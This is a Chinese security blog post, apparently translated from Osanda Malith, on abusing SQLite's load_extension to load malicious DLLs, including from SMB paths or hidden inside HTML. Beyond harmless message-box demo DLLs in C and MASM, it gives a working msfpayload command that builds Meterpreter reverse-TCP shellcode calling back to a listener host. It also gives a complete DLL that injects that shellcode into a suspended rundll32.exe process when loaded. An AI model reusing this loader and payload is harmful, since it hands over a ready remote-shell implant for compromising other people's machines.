
谈一谈SQLite Load_Extension的妙用

2016-10-12 06:05

什么是load_extension?

这个接口用于加载一个SQLite扩展库文件

a1

更多信息:https://www.sqlite.org/c3ref/load_extension.html

你可以用这个函数来加载一个SQLite扩展。但是扩展加载功能在默认情况下是关闭的(由sqlite3_enable_load_extension()控制),以防止SQL注入攻击借此加载扩展。

你可以从这里了解更多:https://www.sqlite.org/c3ref/enable_load_extension.html

语法:

a2

参数const char *zFile所指定的路径也可以是一个SMB共享路径

自定义DLL

我们可以定义自己的恶意DLL文件并执行我们自己的恶意代码。

#include <windows.h>
/*
 * Author: @OsandaMalith
 * Website: http://osandamalith.com
 *
 * Demo DLL entry point: shows one message box when the DLL is mapped into
 * a process (DLL_PROCESS_ATTACH) and another one on thread attach, thread
 * detach and process detach. Any other reason code does nothing. Always
 * reports success to the loader.
 */
BOOL WINAPI DllMain (
 HANDLE hinstDLL,
 DWORD fdwReason,
 LPVOID lpvReserved)
{
 (void)hinstDLL;
 (void)lpvReserved;

 if (fdwReason == DLL_PROCESS_ATTACH) {
  MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
 } else if (fdwReason == DLL_THREAD_ATTACH
         || fdwReason == DLL_THREAD_DETACH
         || fdwReason == DLL_PROCESS_DETACH) {
  MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
 }
 return TRUE;
}
 
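/*
 * Demo helper: shows an informational message box.
 *
 * Returns 0. The original declared an int return type but fell off the
 * end of the function, so any caller reading the result hit undefined
 * behaviour; the explicit return gives it a defined value.
 */
int hello() {
 MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
 return 0;
}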

也可以用MASM32来编写,这样生成的DLL体积非常小

.386

; Author: @OsandaMalith 
 ; Website: http://osandamalith.com

.MODEL flat,stdcall

OPTION CASEMAP:NONE

Include windows.inc
Include user32.inc
Include kernel32.inc

IncludeLib user32.lib
IncludeLib kernel32.lib

.DATA

; NUL-terminated strings used below as MessageBox caption (AppName) and body text.
AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0

.code
; DLL entry point. Shows one MessageBox per loader notification:
; process attach, process detach, thread attach, and (the .else branch)
; every other reason code, which in practice is thread detach.
; Returns TRUE in eax to tell the loader that initialisation succeeded.
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
 .if reason==DLL_PROCESS_ATTACH
 invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
 .elseif reason==DLL_PROCESS_DETACH
 invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
 .elseif reason==DLL_THREAD_ATTACH
 invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
 .else 
 invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
 .endif
 ; Success code for the loader.
 mov eax,TRUE
 ret
DllEntry Endp

; Demo procedure: shows the HelloMsg box with the AppName caption and returns.
hello proc
 invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
 ret 
hello endp

End DllEntry

a4

HTML + DLL

你可以参考hasherezade的drop_and_run项目

https://github.com/hasherezade/snippets/tree/master/drop_and_run中的demo.html演示了把DLL文件嵌入HTML注释的做法。因此,我们可以把自己的恶意DLL嵌入到一个HTML文件中

a5

a6

Shellcode + GameOver

我们也可以在自己的DLL中嵌入并执行shellcode,在这个例子中我使用的是Meterpreter反向TCP shellcode。

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c

#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
#define SCSIZE 2048
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";
 
/*
 * Zero l bytes starting at p, one byte at a time.
 * Does nothing when l == 0. p must point to at least l writable bytes.
 */
void inline_bzero(void *p, size_t l)
{
 unsigned char *dst = p;
 unsigned char *end = dst + l;
 for (; dst != end; dst++) {
  *dst = 0x00;
 }
}
 
void boom(void);
 
/*
 * Entry point of the shellcode-carrying DLL. The only work happens on
 * DLL_PROCESS_ATTACH, where boom() is called directly from DllMain (i.e.
 * on the thread that loaded the library). Thread attach/detach and
 * process detach are no-ops. Returns TRUE in every case.
 */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
 switch (dwReason)
 {
 case DLL_PROCESS_ATTACH:
 boom();
 break;
 
 case DLL_PROCESS_DETACH:
 break;
 
 case DLL_THREAD_ATTACH:
 break;
 
 case DLL_THREAD_DETACH:
 break;
 }
 return TRUE;
}
 
/*
 * Starts a new rundll32.exe suspended and redirects its primary thread to
 * the bytes in the file-scope `code` buffer: remote RWX allocation,
 * WriteProcessMemory of the whole SCSIZE buffer (initializer plus zero
 * padding), instruction-pointer rewrite through SetThreadContext, then
 * ResumeThread. From a detection standpoint this create-suspended /
 * remote RWX write / thread-context swap chain, together with rundll32.exe
 * launched without arguments, is the sequence endpoint monitoring keys on.
 * Finishes by terminating the calling thread with ExitThread(0).
 * `error` and `prot` are declared but never used.
 */
void boom(void) {
 int error;
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 CONTEXT ctx;
 DWORD prot;
 LPVOID ep;
 
 inline_bzero( &si, sizeof( si ));
 si.cb = sizeof(si);
 
 /* Child starts suspended so its thread context can be replaced before it runs. */
 if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
 ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
 GetThreadContext(pi.hThread, &ctx);
 
 /* Writable+executable region in the child process: a common detection signal. */
 ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
 WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
 
 /* Child's first instruction becomes the start of the copied buffer. */
#ifdef _WIN64
 ctx.Rip = (DWORD64)ep;
#else
 ctx.Eip = (DWORD)ep;
#endif
 
 SetThreadContext(pi.hThread,&ctx);
 
 ResumeThread(pi.hThread);
 CloseHandle(pi.hThread);
 CloseHandle(pi.hProcess);
 }
 /* Ends the loader thread; control never returns to DllMain's caller. */
 ExitThread(0);
}

a7

参考

  • https://www.sqlite.org/c3ref/load_extension.html
  • https://www.sqlite.org/c3ref/enable_load_extension.html
  • https://github.com/hasherezade/snippets/tree/master/drop_and_run
  • https://osandamalith.com/2016/10/10/fun-with-sqlite-load_extension/


知识来源: www.mottoin.com/90266.html
